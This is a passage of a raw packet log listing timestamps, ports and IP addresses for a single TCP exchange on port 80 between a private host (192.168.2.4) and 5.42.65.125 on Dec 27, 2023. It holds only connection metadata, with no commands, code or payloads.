Dec 27, 2023 18:12:25.380383015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380392075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380458117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380465984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380477905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380485058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380491972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380498886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380505085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.380511045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.380527973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381016016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381055117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381062031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381102085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381153107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381160975 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381192923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381227016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381234884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381274939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381315947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381324053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381357908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381447077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381458998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381464958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381472111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381478071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381484032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381493092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381494999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381503105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381510019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381511927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381517887 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381525993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381541967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381570101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381640911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381649971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381681919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381732941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381741047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381752014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381758928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381766081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.381774902 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.381800890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382203102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382217884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382224083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382236004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382261038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382270098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382297993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382303953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382311106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382323027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382342100 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382348061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382355928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382370949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382396936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382405996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382414103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382426023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382443905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382445097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382452011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382461071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382477999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382504940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382520914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382528067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382565975 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382580042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382587910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382595062 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382618904 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.382661104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382668972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.382708073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383039951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383047104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383081913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383116007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383125067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383162022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383276939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383284092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383291960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383315086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383317947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383322954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383357048 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383392096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383399963 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383411884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383434057 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383441925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383479118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383483887 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383557081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383564949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383575916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383600950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383634090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383641005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383655071 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383661032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383666992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383678913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383681059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383692026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383697987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383701086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383706093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383721113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.383730888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.383766890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384267092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384274960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384287119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384293079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384299040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384316921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384334087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384347916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384372950 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384381056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384387970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384413958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384416103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384422064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384445906 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384455919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384474039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384545088 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384552002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384563923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384569883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384577036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384582996 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384586096 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384618044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384635925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384643078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384649038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384655952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384668112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.384670973 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.384691000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385137081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385144949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385159016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385179996 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385209084 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385236025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385584116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385591984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385615110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385628939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385651112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385695934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385703087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385716915 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385724068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385730028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385735989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385741949 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385744095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385751009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385757923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385775089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385790110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385819912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385828018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385833979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385840893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385848045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385859013 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385888100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385894060 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385901928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385914087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385921955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385929108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385936022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.385938883 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385960102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.385987043 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.387789011 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387795925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387845039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.387849092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387856960 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387867928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387896061 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.387931108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387938023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387944937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387952089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387958050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387967110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.387969017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387975931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.387989044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388011932 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388021946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388029099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388036013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388058901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388082981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388091087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388107061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388123989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388148069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388192892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388200045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388211012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388216972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388226986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388236046 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388238907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388246059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388253927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388264894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388268948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388271093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388278961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388286114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388292074 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388293028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388309956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388323069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388329983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388335943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388343096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388350010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388360977 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388389111 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388448954 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388456106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388467073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388473034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388478994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388485909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388489962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388492107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388498068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388506889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388509989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388516903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388525009 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388531923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388540030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388540030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388546944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388552904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388556957 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388572931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388585091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.388914108 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388947964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388956070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388967037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.388995886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389008999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389015913 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389027119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389034033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389051914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389067888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389100075 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389106989 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389120102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389137983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389146090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389146090 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389153957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389173031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389202118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389291048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389297962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389308929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389316082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389322042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389328003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389338017 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389339924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389347076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389359951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389367104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389367104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389385939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389396906 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.389801025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389828920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389843941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.389882088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390006065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390013933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390038013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390048027 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390079021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390113115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390121937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390137911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390145063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390156031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390162945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390170097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390173912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390182018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390193939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390198946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390201092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390222073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390239000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390362024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390369892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390381098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390387058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390398979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390404940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390410900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390417099 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390418053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390424967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390431881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390435934 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390438080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390463114 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390896082 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390923023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390928984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390940905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.390955925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.390969038 CET	80	49738	5.42.65.125	192.168.2.4
